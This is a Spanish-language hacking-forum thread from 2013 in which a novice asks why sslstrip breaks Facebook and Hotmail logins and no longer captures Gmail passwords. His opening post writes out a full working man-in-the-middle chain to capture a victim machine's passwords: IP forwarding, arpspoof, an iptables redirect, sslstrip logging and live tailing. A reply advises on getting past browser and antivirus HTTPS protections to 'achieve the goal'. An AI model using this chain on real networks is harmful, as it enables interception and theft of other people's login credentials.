elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Wireless
| | |-+  Se bloquean algunas poaginas cuando snifo la contrasena con sslstrip
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Se bloquean algunas poaginas cuando snifo la contrasena con sslstrip  (Leído 2,972 veces)
K4rl0sh

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Se bloquean algunas poaginas cuando snifo la contrasena con sslstrip
« en: 8 Mayo 2013, 01:05 am »

Hola a todos

Soy nuevo en el foro y un muy novato en esto, asi que espero que me podais aclalar algunas dudas.

Estoy haciendo pruebas en mi red. Tengo un ordenador atacante con ubuntu donde usaba ettercap pero lo deje porque me bloqueaba mucho el ordenador victima, asi que buscando por internet llegue a un post de este foro donde le pasaba lo mismo a un forero y lo que hacia es

echo 1 > /proc/sys/net/ipv4/ip_forward

(arpspoof -i {interfaz_red} -t {ip_victima} {ip_router})
      arpspoof -i eth0 -t 192.168.1.100 192.168.1.1

(Hasta aqui es lo que hacia con ettercap)

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

sslstrip -w miarchivo

tail -f miarchivo *  (para ver las pass en el mismo momento de la captura)

Esto me funciona bastante bien pero cuando meto las contrasenas en el ordenador victima veo que la pagina de facebook entra pero no accede a los contenidos y la de hotmail me pide la contrasena en un bucle infinito pero nunca entra.  Me imagino que sera por el sslstrip al cambiar https por http.

Esto es normal? y si es asi se puede evitar?

Otra cosa es que con gmail ayer capturaba las pass y hoy por mas que la introduzco en el ordenador victima no me las captura. Es mas si activo el wireshark no veo apenas movimientos de esta pagina. Esto a que se puede deber?

Gracias y un saludo


En línea

Sh4k4


Desconectado Desconectado

Mensajes: 965


xMHT


Ver Perfil
Re: Se bloquean algunas poaginas cuando snifo la contrasena con sslstrip
« Respuesta #1 en: 8 Mayo 2013, 02:36 am »

que version usas? usas la ultima? hay bugs!! si los hay como el de carga de youtube habra que checarlo o arreglarlo a mano si el colega moxie no lo ha hecho.... no olvides los navegadores y sus funciones anti, antivirus, firewalls y addons que ya forzan el https y demas anti jugadas phishing... primero snifea algo de tiempo y ve que trafico que servidores asi te daras algo de idea de que AV opera y que navegador o  hasta donde quizas debas envenenar.... para lograr tu objetivo.


« Última modificación: 8 Mayo 2013, 02:38 am por Sh4k4 » En línea

K4rl0sh

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Re: Se bloquean algunas poaginas cuando snifo la contrasena con sslstrip
« Respuesta #2 en: 8 Mayo 2013, 23:17 pm »

Muchas gracias por responder.

Uso la version 0.9 de sslstrip, que creo que es la ultima (al menos es la que esta en el centro de software). Es esta la que tiene bugs? Deberia instalar otra version entonces?

Por desgracia, yo no tengo los conocimientos para arreglar eso a mano...

En cuanto al ordenador victima tiene instalado ubuntu 12.04 y el navegador es firefox y que yo sepa no lleva ningun addon que fuercen el https.. Tampoco tiene antivirus..

Aunque lo que mas uso es ubuntu, tengo mas sistemas operativos instalados en ellos asi que probare tambien con Windows
En línea

Sh4k4


Desconectado Desconectado

Mensajes: 965


xMHT


Ver Perfil
Re: Se bloquean algunas poaginas cuando snifo la contrasena con sslstrip
« Respuesta #3 en: 9 Mayo 2013, 19:07 pm »

intenta versiones anteriores, la 0.9 me parece si esta afectada por el bug de carga de youtube asi que... de que funciona funciona, ahora intenta emular un pc victim con las mismas caracteristicas y veras que falla.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
por que cuando saco la clave de una wep algunas cargan datas muy rapido y
Hacking Wireless
titan711 1 2,761 Último mensaje 2 Enero 2011, 16:53 pm
por kupu88
SSLSTRIP « 1 2 3 »
Hacking
BeLGaRioN 20 14,655 Último mensaje 9 Diciembre 2011, 11:33 am
por D_pit_88
Acabo de instalar back track 5 y cuando reinicio me pide contraseña
Hacking
rj12 3 4,529 Último mensaje 19 Diciembre 2011, 03:29 am
por koly
Las copias no activadas de Windows 8.1 bloquean algunas características
Noticias
wolfbcn 0 1,526 Último mensaje 21 Octubre 2013, 14:13 pm
por wolfbcn
¿Cómo bloquean algunas páginas esto?
Desarrollo Web
e 5 2,431 Último mensaje 10 Octubre 2019, 13:06 pm
por @XSStringManolo
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines